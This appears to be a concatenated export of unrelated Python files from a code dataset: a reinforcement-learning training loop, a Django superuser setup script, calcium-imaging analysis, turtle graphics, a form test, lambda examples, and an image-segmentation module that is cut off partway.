q_optimizer.zero_grad()
q_loss_1 = ((q_function_1(o, a) - q_targ)**2).mean()
q_loss_2 = ((q_function_2(o, a) - q_targ)**2).mean()
q_loss = q_loss_1 + q_loss_2
q_loss.backward()
q_optimizer.step()
# Freeze Q-network so you don't waste computational effort
# computing gradients for it during the policy learning step.
for p in q_params:
p.requires_grad = False
# Policy function update
policy_optimizer.zero_grad()
a_bar, logp = policy(o)
ent = - alpha * logp
q_1 = q_function_1(o, a_bar)
q_2 = q_function_2(o, a_bar)
q = torch.min(q_1, q_2)
policy_loss = -(q + ent).mean()
policy_loss.backward()
policy_optimizer.step()
# Unfreeze Q-network so you can optimize it at next step.
for p in q_params:
p.requires_grad = True
# Update target networks with polyak
with torch.no_grad():
for q, q_targ in zip(q_function_1.parameters(), q_function_target_1.parameters()):
q_targ.data.mul_(polyak)
q_targ.data.add_((1 - polyak) * q.data)
for q, q_targ in zip(q_function_2.parameters(), q_function_target_2.parameters()):
q_targ.data.mul_(polyak)
q_targ.data.add_((1 - polyak) * q.data)
update()
if (step + 1) % steps_per_epoch == 0:
epoch = (step + 1) // steps_per_epoch
# Save model
if (epoch % save_freq == 0) or (epoch == epochs):
logger.save_state({'env': env}, None)
# Test the performance of the deterministic version of the agent.
def test_agent():
with torch.no_grad():
for j in range(num_test_episodes):
o, d, ep_ret, ep_len = test_env.reset(), False, 0, 0
while not(d or (ep_len == max_ep_len)):
# Take deterministic actions at test time
a, _ = policy(torch.tensor(o, dtype=torch.float32).unsqueeze(0), deterministic=True)
assert a.shape == (1, act_dim)
a = a[0] # Remove batch dimension
a = a.numpy() # Convert to numpy
o, r, d, _ = test_env.step(a)
ep_ret += r
ep_len += 1
logger.store(TestEpRet=ep_ret, TestEpLen=ep_len)
test_agent()
# Log info about epoch
logger.log_tabular('Epoch', epoch)
logger.log_tabular('EpRet', with_min_and_max=True)
logger.log_tabular('EpLen', average_only=True)
logger.log_tabular('TestEpRet', with_min_and_max=True)
logger.log_tabular('TestEpLen', average_only=True)
logger.log_tabular('TotalEnvInteracts', step)
logger.log_tabular('Time', time.time()-start_time)
logger.dump_tabular()
|
990,973 | c86b9a251675f2ac107bfc8f881ea7e35c4fc47a | import django
import json
import os, sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bibstat.settings")
from django.conf import settings
from mongoengine.django.auth import User
user = User.create_user(email = '',
username = '',
password = '')
user.is_active = True
user.is_staff = True
user.is_superuser = True
user.save()
print(user)
|
990,974 | 3d716886653bcd2390eda507fe5daf993e1fe537 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 11 19:44:20 2017
@author: jcoleman
"""
# Coleman lab modules - combine into a single class?
from calcium import OpenStepCalcium as OSC
from calcium import calcium_imaging_data_fast as cidfast
from calcium import open_calcium_data_fast as ocdfast
from calcium import StepCodeFile as SCF
# Python modules
import numpy as np
from collections import OrderedDict
import cPickle as pickle
#==============================================================================
#Get step code file (*.bin), TIF image, ROI.zip files
#==============================================================================
#fileDirectoryTS = 'F:/coleman lab/jasonc/thygcamp6s_test2/'
#fileDirectory = 'F:/coleman lab/jasonc/thygcamp6s_test2/'
#fileDirectory = '/Users/jcoleman/Documents/--DATA--/in vivo gcamp analysis/thygcamp6s_LT4(9-10-17)/'
fileDirectory = '/Users/jcoleman/Documents/--DATA--/in vivo gcamp analysis/thygcamp6s_D4 5Hz (9-30-17)/'
datafile = 'D4_001_Z1_hz1'
if datafile == 'D4_001_Z1_hz1':
fileBin = 'mThy6s2_alldrift_D2_001_12_data.bin'
imgname = 'STD_mThy6s2_alldrift_D2_001.tif'
roizipname = 'mThy6s2_alldrift_D2_001_ROI.zip'
if datafile == 'D3_001_Z1t1_hz05':
fileBin = 'mThy6s_001_D3_6_data.bin'
imgname = 'STD_mThy6s2_alldrift_D3_001Z1.tif'
roizipname = 'mThy6s2_alldrift_D3_001Z1_ROI.zip'
if datafile == 'D3_001_Z1t2_hz05':
fileBin = 'mThy6s_001_D3Z1t2_13_data.bin'
imgname = 'STD_mThy6s2_alldrift_D3_001Z1t2.tif'
roizipname = 'mThy6s2_alldrift_D3_001Z1t2_ROI.zip'
if datafile == 'D4_001_Z1_hz1':
fileBin = 'mThy6s_001_D4Z1_2_data.bin'
imgname = 'STD_mThy6s2_alldrift_D4_001Z1.tif'
roizipname = 'mThy6s2_alldrift_D4_001Z1_ROI.zip'
if datafile == 'D4_001_Z1_hz5':
fileBin = 'mThy6s_001_D4Z1hz5_5_data.bin'
imgname = 'STD_mThy6s2_alldrift_D4_001Z1hz5.tif'
roizipname = 'mThy6s2_alldrift_D4_001Z1hz5_ROI.zip'
if datafile == 'D4_002_Z1_hz1':
fileBin = 'mThy6s_002_D4Z1_3_data.bin'
imgname = 'STD_mThy6s2_alldrift_D4_002Z1.tif'
roizipname = 'mThy6s2_alldrift_D4_002Z_ROI.zip'
if datafile == 'D4_002_Z1_hz5':
fileBin = 'mThy6s_002_D4Z1hz5_4_data.bin'
imgname = 'STD_mThy6s2_alldrift_D4_002Z1hz5.tif'
roizipname = 'mThy6s2_alldrift_D4_002Zhz5_ROI.zip'
# parameters for mulitplot function
import readroi as roizip
a=roizip.read_roi_zip(fileDirectory + roizipname)
rows = len(a) # number of ROIs
cols = 8 # number of distinct stims
#==============================================================================
#==============================================================================
#PARAMETERS
#==============================================================================
daqRecordingFreq = 1000.0 #sampling rate - Hz
stimList = [0,45,90,135,180,225,270,315]
#stimList = [0,45,90,135,180] #designate flip/flop?
csvfiletype = 3 # 1= ; 2= ; 3=FIJI/ImageJ csv intensity file
"""
Parameters for Konnerth lab dF/F; EWMA
for a 30Hz (Fs) imaging systems the following parameter setup is
recommended (empirical note on Nature paper):
t_0= 0.2;
t_1=0.75;
t_2=3;
"""
t_0 = 0.2 #0.2 for 30fps; 0.8 for 7.6fps
t_1 = 0.75
t_2 = 3
mpmSamplingFreq = 30 #~fps for 2p
# gray time (in between stims)
gray_offset= 7.0 #seconds
# set the window for averaging pre-stim gray (207 frames = 7s)
pre_timewindow = 207-30 #207-75 # e.g., 207-30 = 1s from 30fps sample rate
#==============================================================================
# Begin decoding and data extraction
code_file = SCF.StepCodeFile(fileDirectory+fileBin,8,8,1000)
stims = code_file.get_stim_angles(stimList)
Bframes = [ts[0] for ts in code_file.timestamps[2]]
#get intensity file
cellsraw, cellsmean, areas, xycoords, Data = ocdfast.openData(csvfiletype)
datatype = 'raw' # use raw IntDen/Area data, for normalizing to visual stim
#datatype = 'filtered' # use EWMA smoothing, etc
# Run Konnerth lab deltaF/F and EWMA filter - USAGE: (cells = raw intensity data)
# calculate DeltaF/F
#if datatype == 'filtered':
dff, dff_ewma, dff_offset = cidfast.run_deltaf_ewma(cellsmean, t_0, t_1, t_2, mpmSamplingFreq)
#cells = deepcopy(dff_ewma)
# Filter raw data - use for deltaF/F below (using pre-gray 1s as f0)
#elif datatype == 'raw':
#cells = deepcopy(cellsmean)
cells = list()
#lo-pass filter for raw data: butter_lowpass_filter(data,cutoff_freq,sampling_freq,order)
for cell in range(len(cellsmean)):
if mpmSamplingFreq == 30:
lopass_temp = OSC.butter_lowpass_filter(cellsmean[cell],1.0,mpmSamplingFreq,1)
cells.append(lopass_temp)
elif mpmSamplingFreq != 30:
print('Enter correct sampling frequency (mpmSamplingFreq) for butter_lowpass_filter')
handler = cidfast.FileHandler()
#makes dictionary of [cellnumber][orientation][block]
gray_offset *= daqRecordingFreq
response_rawdata = OrderedDict()
grays = OrderedDict()
response_indices = OrderedDict()
grays_indices = OrderedDict()
for cell in range(len(cells)):
response_rawdata[cell] = OrderedDict()
grays[cell] = OrderedDict()
response_indices[cell] = OrderedDict()
grays_indices[cell] = OrderedDict()
for stim in stims:
response_rawdata[cell][stim] = list()
grays[cell][stim] = list()
response_indices[cell][stim] = list()
grays_indices[cell][stim] = list()
for ts in stims[stim]:
begin = float(ts[0])
end = float(ts[1])
begin_frame_time = handler.get_nearest(begin, Bframes)
begin_gray_time = handler.get_nearest(begin - gray_offset, Bframes)
end_frame_time = handler.get_nearest(end, Bframes)
end_gray_time = handler.get_nearest(begin, Bframes)
begin_frame = list(Bframes).index(begin_frame_time)
begin_gray = list(Bframes).index(begin_gray_time)
end_frame = list(Bframes).index(end_frame_time)
end_gray = list(Bframes).index(end_gray_time)
chunk = cells[cell][int(begin_frame):int(end_frame)]
gray_chunk = cells[cell][int(begin_gray):int(end_gray)]
response_rawdata[cell][stim].append(chunk)
grays[cell][stim].append(gray_chunk)
response_indices[cell][stim].append([int(begin_frame),int(end_frame)])
grays_indices[cell][stim].append([int(begin_gray),int(end_gray)])
#example: plots all 5 block of degree 45 orientation for cell 0
#cell_0_45 = response_rawdata[0][45]
#
#for block in cell_0_45:
#
# plt.plot(block)
# Calculate deltaF/F by block using mean of 1s pre-gray for each stim for f0 (where ft = fluorescence at time t)
# First, get 1s pre-stim gray data and store in dictionary: pre1sgray[cell][orientation][block]
pre1sgray_data = OrderedDict()
for cell in grays:
pre1sgray_data[cell] = OrderedDict()
for orientation in grays[cell]:
pre1sgray_data[cell][orientation] = OrderedDict()
for block in range(len(grays[cell][orientation])):
pre1sgray_data[cell][orientation][block] = grays[cell][orientation][block][pre_timewindow:end]
# Second, store deltaF/F response data: response_data[cell][orientation][block]
response_data = OrderedDict()
for cell in pre1sgray_data:
response_data[cell] = OrderedDict()
for orientation in pre1sgray_data[cell]:
response_data[cell][orientation] = OrderedDict()
for block in range(len(pre1sgray_data[cell][orientation])):
tempmean = np.mean(pre1sgray_data[cell][orientation][block])
response_data[cell][orientation][block] = (response_rawdata[cell][orientation][block] - tempmean) / tempmean
# Third, store deltaF/F response data for gray 1s: pre1sgray_data[cell][orientation][block]
pre1sgray_dFoF_data = OrderedDict()
for cell in pre1sgray_data:
pre1sgray_dFoF_data[cell] = OrderedDict()
for orientation in pre1sgray_data[cell]:
pre1sgray_dFoF_data[cell][orientation] = OrderedDict()
for block in range(len(pre1sgray_data[cell][orientation])):
tempmean = np.mean(pre1sgray_data[cell][orientation][block])
pre1sgray_dFoF_data[cell][orientation][block] = (pre1sgray_data[cell][orientation][block] - tempmean) / tempmean
#for ori in response_data[26]:
#
# cell_0_x = response_data[26][ori]
# plt.subplots()
#
# for block in cell_0_x:
#
# plt.plot(cell_0_x[block])
# tempvals = list()
# for i in range(len(cell_0_x)):
# tempvals.append(cell_0_x[i][0:147])
# tempmean = np.mean(tempvals,axis=0)
# plt.plot(tempmean, lw=3, c='k')
#Third, for plotting: concatenate pre1sgray_data:response_data:post3sgray_data
#response_prepost_data[cell][orientation][block] = np.concatenate((pre1sgray_data[cell][orientation][block], response_data[cell][orientation][block]), axis=0)
pre_response_post_data = OrderedDict()
for cell in pre1sgray_data:
pre_response_post_data[cell] = OrderedDict()
for orientation in pre1sgray_data[cell]:
pre_response_post_data[cell][orientation] = OrderedDict()
for block in range(len(pre1sgray_data[cell][orientation])):
pre_temp = pre1sgray_data[cell][orientation][block]
response_temp = response_rawdata[cell][orientation][block]
#need to figure out how to get gray after each ORI (use stim indices to get 0:30 gray "chunk" after stim)
#post_temp = grays[cell][orientation][block][0:30:end]
concat_prestim_temp = np.concatenate((pre_temp, response_temp),axis=0)
#concat_prestimpost_temp = np.concatenate((concatprestim_temp, ???),axis=0)
tempmean = np.mean(pre1sgray_data[cell][orientation][block])
pre_response_post_data[cell][orientation][block] = (concat_prestim_temp - tempmean) / tempmean
#for ori in pre_response_post_data[26]:
#
# cell_0_x = pre_response_post_data[26][ori]
# plt.subplots()
#
# for block in cell_0_x:
#
# plt.plot(cell_0_x[block])
#
# tempvals = list()
#
# for i in range(len(cell_0_x)):
#
# tempvals.append(cell_0_x[i][0:147])
#Gets response averages and pre-stim response averages
response_avgs = OrderedDict()
pre_response_post_avgs = OrderedDict()
pregray1s_response_avgs = OrderedDict()
for cell in response_data:
response_avgs[cell] = OrderedDict()
pre_response_post_avgs[cell] = OrderedDict()
pregray1s_response_avgs[cell] = OrderedDict()
for orientation in response_data[cell]:
cell_ori = response_data[cell][orientation].values()
cell_ori_long = pre_response_post_data[cell][orientation].values()
cell_ori_gray1s = pre1sgray_dFoF_data[cell][orientation].values()
#trim signals down to shortest length for averaging
min_chunk_length = min([len(x) for x in cell_ori])
cell_ori = [x[0:min_chunk_length] for x in cell_ori]
min_chunk_length_long = min([len(x) for x in cell_ori_long])
cell_ori_long = [x[0:min_chunk_length_long] for x in cell_ori_long]
min_chunk_length_gray1s = min([len(x) for x in cell_ori_gray1s])
cell_ori_gray1s = [x[0:min_chunk_length_gray1s] for x in cell_ori_gray1s]
A = np.array(cell_ori)
Along = np.array(cell_ori_long)
Agray = np.array(cell_ori_gray1s)
B = np.mean(A, axis = 0)
Blong = np.mean(Along, axis = 0)
Bgray = np.mean(Agray, axis = 0)
response_avgs[cell][orientation] = B
pre_response_post_avgs[cell][orientation] = Blong
pregray1s_response_avgs[cell][orientation] = Bgray
#example: plots all 45 degree responses
#for cell in response_avgs:
# plt.plot(response_avgs[cell][45])
#example: plots all orientations for cell 10
#for ori in response_avgs[10]:
# plt.plot(response_avgs[0][ori])
# stim_onsetframes, grays_onsetframes = getOnsetIndices(response_indices, grays_indices)
# use for plotting t1 vs t2 responses over time, etc
responses_means = OSC.get_ori_responses(response_avgs)
# use Mann-Whitney U to compare each cell's orientation response (full mean trace) to corresponding pre-gray (full mean trace)
#get all orienation response means for a given cell
#cell = 6
stimwindow = 145
pthresh = 0.05
togglePlot = 0 # recommended ONLY for troubleshooting (creates #cells x 8 figures)
#all_response_indices=get_response(response_avgs, pregray1s_response_avgs, pre_response_post_avgs, stimwindow, pthresh, togglePlot)
all_response_indices = OSC.get_response(response_avgs, pregray1s_response_avgs, pre_response_post_avgs, stimwindow, pthresh, togglePlot)
# pull out first ~60sec (1700 frames) of gray
gray_frames = list()
for cell in range(len(dff_ewma)):
temp_gray = (dff_ewma[cell][0:1700])
gray_frames.append(temp_gray)
# Run some functions
# Save all variables from the session; to load --> >>> dill.load_session(fileDirectory+filenamepkl)
filenamedill = roizipname.replace('ROI.zip','SESSION.pkl')
filenamepkl = roizipname.replace('ROI.zip','VARS.pickle')
#dill.dump_session(fileDirectory+'RAW_'+filenamepkl)
# Pickle specific variables for response t1 vs. t2, etc plotting
# obj0, obj1, obj2 are created here...
# Saving the objects:
with open(fileDirectory+filenamepkl, 'w') as f: # Python 3: open(..., 'wb')
pickle.dump({'response_avgs':response_avgs, 'pregray1s_response_avgs':pregray1s_response_avgs,
'pre_response_post_avgs':pre_response_post_avgs,
'responses_means':responses_means, 'stimwindow':stimwindow, 'pthresh':pthresh,
'all_response_indices':all_response_indices}, f)
#==============================================================================
#OSC.tracePlot(gray_frames, response_indices, grays_indices)
OSC.plotStack(fileDirectory, imgname, roizipname, all_response_indices)
OSC.multiPlot(pre_response_post_avgs,rows, cols,range(0,rows),[-0.5,1.0], 207-pre_timewindow,
all_response_indices)
|
990,975 | 5dbae4d97e53d04e4c2390a67ec248fa9da2496f | import turtle as trtl
import random
t = trtl.Turtle()
a = -400
b = -400
t.speed(5)
t.pensize(5)
for x in range(5):
a = a + 100
b = b + 100
t.penup()
t.setposition(a, b)
t.pendown()
randint2 = random.randrange(1,8)
if randint2 == 1:
t.color("red")
elif randint2 == 2:
t.color("blue")
elif randint2 == 3:
t.color("green")
elif randint2 == 4:
t.color("pink")
elif randint2 == 5:
t.color("purple")
elif randint2 == 6:
t.color("yellow")
elif randint2 == 7:
t.color("orange")
elif randint2 == 8:
t.color("turqoise")
for x in range(5):
randint1 = random.randrange(1,5)
rsize = random.randrange(20,150)
if randint1 == 1:
t.begin_fill()
t.circle(rsize)
t.end_fill()
elif randint1 == 2:
t.begin_fill()
t.circle(rsize,360,4)
t.end_fill()
elif randint1 == 3:
t.begin_fill()
t.circle(rsize,360,3)
t.end_fill()
elif randint1 == 4:
t.begin_fill()
t.circle(rsize,360,8)
t.end_fill()
elif randint1 == 5:
t.begin_fill()
t.circle(rsize,360,30)
t.end_fill()
wn = trtl.Screen()
wn.mainloop() |
990,976 | b71f32279ec3cb0fd9f24098468d57686ae80256 | """
vega-admin module to test forms
"""
from django.test import TestCase, override_settings
from vega_admin.forms import ListViewSearchForm
class TestForms(TestCase):
"""
Test class for forms
"""
@override_settings(
VEGA_LISTVIEW_SEARCH_QUERY_TXT="Search now",
VEGA_LISTVIEW_SEARCH_TXT="Search!",
VEGA_CRISPY_TEMPLATE_PACK="bootstrap3"
)
def test_listview_search_form(self):
"""
Test ListViewSearchForm
"""
data = {'q': 'give me peanuts'}
form = ListViewSearchForm(data=data)
self.assertTrue(form.is_valid())
self.assertHTMLEqual(
"""
<p>
<label for="id_q">Search Query:</label>
<input type="text" name="q" value="give me peanuts" id="id_q">
</p>
""",
form.as_p()
)
|
990,977 | ae1b43849814e4dc7b666a0f913d77db0ed7eb03 | L = list(map(lambda x: x*x,[1,2,3,4,5,6,7,8,9]))
print(L)
def build(x,y):
return lambda : x*x+y*y
L = build(1,2)
print(L())
L = list(filter(lambda x: x%2==1,range(1,20)))
print(L) |
990,978 | 2a46896cd404638d9e382d2f086dd519c7a3898b | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import os
import shutil
import subprocess
from multiprocessing import Pool, Process, Queue, Manager
from PIL import Image
from scipy import ndimage
from skimage import feature, filters, measure, morphology, data, color
from skimage.transform import hough_circle, hough_circle_peaks
# high level
def applySegmentationSteps(input_img, input_mode, output_root, save_intermediate=False, overwrite=False):
""" This is a convenience function to apply all my vision steps in one go.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param output_root: The filepath to the directory where outputs will be created.
:type output_root: str
:param save_intermediate: Flag to save intermediate outputs to disk, defaults to False.
:type save_intermediate: bool
:param overwrite: Flag to overwrite existing outputs, defaults to False.
:type overwrite: bool
:return: Returns 0 if output successfully created, otherwise returns 1.
:rtype: int
"""
np_img = loadImage(input_img)
if save_intermediate == False:
np_dist = getDistanceRaster(input_img, input_mode=input_mode)
np_ridge = ridgeDetection(np_dist, 'np', method='meijering', black_ridges=False)
np_blobs = connectedComponentsImage(np_ridge, 'np', output_path=output_root + '_blobs.tif')
exportBlobs(np_img, np_blobs, 'np', output_root)
plt.imsave(output_root + 'blobs_cmap.png', np_blobs, cmap='nipy_spectral')
else:
np_dist = getDistanceRaster(input_img, input_mode=input_mode, output_path=output_root + '_distance.tif')
np_ridge = ridgeDetection(np_dist, 'np', method='meijering', black_ridges=False, output_path=output_root + '_ridge.tif')
np_blobs = connectedComponentsImage(np_ridge, 'np', output_path=output_root + '_blobs.tif')
exportBlobs(np_img, np_blobs, 'np', output_root)
plt.imsave(output_root + 'blobs_cmap.png', np_blobs, cmap='nipy_spectral')
if os.path.exists(output_root + 'blobs_tif'):
return 0
else:
return 1
def calculatePixelMetrics(input_img, input_df):
""" Calculates pixel metrics for every detection in a dataframe.
:param input_img: Filepath to the input img
:type input_img: str
:param input_df: Dataframe with detections
:type input_df: pandas dataframe
:return: Returns the dataframe augmented with pixel metrics.
:rtype: pandas dataframe
"""
new_cir = []
for index, row in input_df.iterrows():
plot = row['plot']
x = row['x']
y = row['y']
r = row['r']
weight = row['weight']
core, inner, outer = countPixels(input_img, 'np', x, y, r)
print(core, inner, outer)
circle = ([plot, x, y, r, weight, core, inner, outer])
new_cir.append(circle)
print('circles added:', len(new_cir))
header = ['plot', 'x', 'y', 'r', 'weight', 'outer', 'inner', 'core']
output_df = pd.DataFrame(new_cir, columns=header)
return output_df
# mid level
def getDistanceRaster(input_img, input_mode, output_path=None):
""" Takes a string containing the file path to the input image and an
optional string with the desired output filepath. Returns a np array
with the distance transform applied. If output path is applied, the
distance raster will be saved.
Note: the logical not is necessary for the scipy function.
https://stackoverflow.com/questions/44770396/how-does-the-scipy-distance-transform-edt-function-work
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array of transformed image
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
np_dist = ndimage.distance_transform_edt(np.logical_not(np_img))
if output_path is not None:
saveImage(np_dist, output_path, mode='dist_norm')
return(np_dist)
def getImageThreshold(input_img, input_mode, threshold, output_path=None):
""" Takes either a string to an image or a np array as input and a float
for thresholding. Supported input modes are: "np" (numpy array) or "fp"
(filepath). Returns a thresholded image. If output path is applied, the
thresholded raster will be saved.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param threshold: The comparison value for thresholding.
:type threshold: int or float
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array of transformed image
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
np_thresh = np.zeros_like(np_img)
dimensions = np_img.shape
for i in range(0, dimensions[0]):
for j in range(0, dimensions[1]):
pixel = np_img[i][j]
if pixel < threshold:
np_thresh[i][j] = 1
else:
np_thresh[i][j] = 0
if output_path is not None:
saveImage(np_thresh, output_path)
return(np_thresh)
def edgeDetection(input_img, input_mode, sigma=1, output_path=None):
""" Takes either a string to an image or a np array as input and an integer
for sigma. Default settings are for thresholded images.Supported input
modes are: "np" (numpy array) or "fp" (filepath). Returns an image of
edge detections. If output path is applied, the edge raster will be saved.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param sigma: Controls the scale of edge detection, defaults to 1.
:type sigma: int
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array of transformed image
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
edges = feature.canny(np_img, sigma=sigma)
if output_path is not None:
saveImage(edges, output_path)
return(edges)
def morphologicalCloseImage(input_img, input_mode, stel=50, output_path=None):
""" Takes either a string to an image or a np array as input and an integer
for structuring element. Applies a circular structuring element. Supported input
modes are: "np" (numpy array) or "fp" (filepath). Returns an image with
a closing appplied. If output path is applied, the closed raster will be saved.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param stel: Controls the size of structuring element, defaults to 50.
:type stel: int
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array of transformed image
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
closed_img = morphology.binary_closing(np_img, morphology.disk(stel))
if output_path is not None:
saveImage(closed_img, output_path)
return(closed_img)
def skeletonizeImage(input_img, input_mode, output_path=None):
""" Takes either a string to an image or a np array as input. Supported
input modes are: "np" (numpy array) or "fp" (filepath). Returns a
skeletonized image. If output path is applied, the closed raster will
be saved.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array of transformed image
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
skeleton = morphology.skeletonize(np_img)
if output_path is not None:
saveImage(skeleton, output_path)
return(skeleton)
def connectedComponentsImage(input_img, input_mode, connectivity=1, output_path=None):
""" Applies connected components labelling to an input image.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param connectivity: Controls the distance to connect components, defaults to 1.
:type connectivity: int
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array with the connected components.
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
dimensions = np_img.shape
blobs = np_img.copy()
for i in range(0, dimensions[0]):
for j in range(0, dimensions[1]):
pixel = np_img[i][j]
if pixel < 0.5:
blobs[i][j] = 1
else:
blobs[i][j] = 0
blobs_labels = measure.label(blobs, connectivity=connectivity)
if output_path is not None:
saveImage(blobs_labels, output_path, mode='blob_labels')
return(blobs_labels)
def exportBlobs(input_img, input_blobs, input_mode, output_root):
""" Input_img and input_blobs will be opened with identical modes. Output is a
directory containing base and blobs subdirectories. Base has the mask for each blob
applied to the image.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_img: Either the filepath to the input blobs (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param output_root: The filepath to the directory where clusters will be saved.
:type output_root: str
:return: Returns 0 upon completion.
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
np_blobs = loadImage(input_blobs)
elif input_mode == 'np':
np_img = input_img
np_blobs = input_blobs
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
clusters = np.unique(np_blobs)
output_base = output_root + '/base'
output_blobs = output_root + '/blobs'
if not os.path.exists(output_base):
os.makedirs(output_base)
if not os.path.exists(output_blobs):
os.makedirs(output_blobs)
group_counter = 0
print(len(clusters))
for i in sorted(clusters):
print("i", i)
print("group", group_counter)
single_blob = np.where(np_blobs == i, True, False)
base_out = single_blob*np_img
blob_out = single_blob*np_blobs
trimmed_blob_out = trim2DArray(blob_out)
ul_x, ul_y = calculateTrimOffsetForward(blob_out)
lr_x, lr_y = calculateTrimOffsetBackward(blob_out)
trimmed_base_out = base_out[ul_y:lr_y,ul_x:lr_x]
print('base', trimmed_base_out.shape)
print('blob', trimmed_blob_out.shape)
if testVerySmallClusters(trimmed_blob_out, 'np') or np.count_nonzero(base_out) < 5: # 5 is a magic constant but there's some logic here. how many points are needed to identify a circle? at least 3 needed in theory, more needed depending on the scanner
print('skipping cluster')
continue
sub_base = output_base + '/' + str(ul_x) + '_' + str(ul_y) + '_' +str(group_counter) + '.tif'
sub_blob = output_blobs + '/' + str(ul_x) + '_' + str(ul_y) + '_' + str(group_counter) + '.tif'
saveImage(trimmed_base_out, sub_base)
saveImage(trimmed_blob_out, sub_blob, mode='blob_labels')
group_counter += 1
return 0
def ridgeDetection(input_img, input_mode, method='meijering', black_ridges=False, output_path=None):
""" Applies ridge detection to an input image.
:param input_img: Either the filepath to the input img (input_mode='fp') or a numpy array (input_mode='np').
:type input_img: str or numpy array
:param input_mode: 'fp' if input_img is a filepath or 'np' if input_img is a numpy array.
:type input_mode: str
:param method: Ridge detection algorithm, defaults to meijering.
:type method: str
:param black_ridges: Controls whether black or white pixels are the ridges, defaults to False (white pixels = ridge).
:type black_ridges: bool
:param output_path: The filepath of the image to be saved.
:type output_path: str, optional
:return: Returns numpy array with the connected components.
:rtype: numpy array
"""
if input_mode == 'fp':
np_img = loadImage(input_img)
elif input_mode == 'np':
np_img = input_img
else:
return (input_mode, " is not a supported mode. Supported modes are 'np' or 'fp'.")
if method == 'meijering':
np_ridges = filters.meijering(np_img, black_ridges=black_ridges)
if output_path is not None:
saveImage(np_ridges, output_path)
return(np_ridges)
# low level
def loadImage(img_path):
""" Returns the image from img path as a np array using PIL.
:param img_path: Filepath to the input img
:type img_path: str
:return: Returns the image loaded as a numpy array.
:rtype: numpy array
"""
img = Image.open(img_path)
np_img = np.array(img)
return (np_img)
def saveImage(np_img, output_path, mode=None, scale=255.0):
""" Takes a np array as input and saves it to output path using PIL.
Current supported modes are:
dist_norm - distance normalization I use for distance transforms
blob_labels - 255 scaling I use for connected components
:param np_img: The numpy array to be saved
:type np_img: numpy array
:param output_path: The filepath of the image to be saved.
:type output_path: str
:param mode: There are two convenience modes: 'dist_norm' (distance transform normalization) and 'blob_labels' (blob labelling), defaults to None.
:type mode: str
:param scale: Value used for scaling in distance normalization, defaults to 255.0
:type scale: int or float
:return: Returns the image loaded as a numpy array.
:rtype: numpy array
"""
if mode is not None:
if mode == 'dist_norm':
np_img *= scale/np_img.max()
np_out = Image.fromarray((np_img).astype('uint8'))
elif mode == 'blob_labels':
np_out = Image.fromarray((np_img*255).astype(np.uint8))
else:
return (mode, " is not a supported mode.")
else:
np_out = Image.fromarray(np_img)
np_out.save(output_path)
if os.path.exists(output_path):
return 0
else:
return 1
def trim2DArray(input_arr, threshold=0):
""" Convenience function to trim a 2D array. Removes any rows/columns
with values equal to or less than the threshold. Source:
https://stackoverflow.com/questions/11188364/remove-zero-lines-2-d-numpy-array?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
:param input_arr: A 2D numpy array to be trimmed.
:type input_arr: numpy array
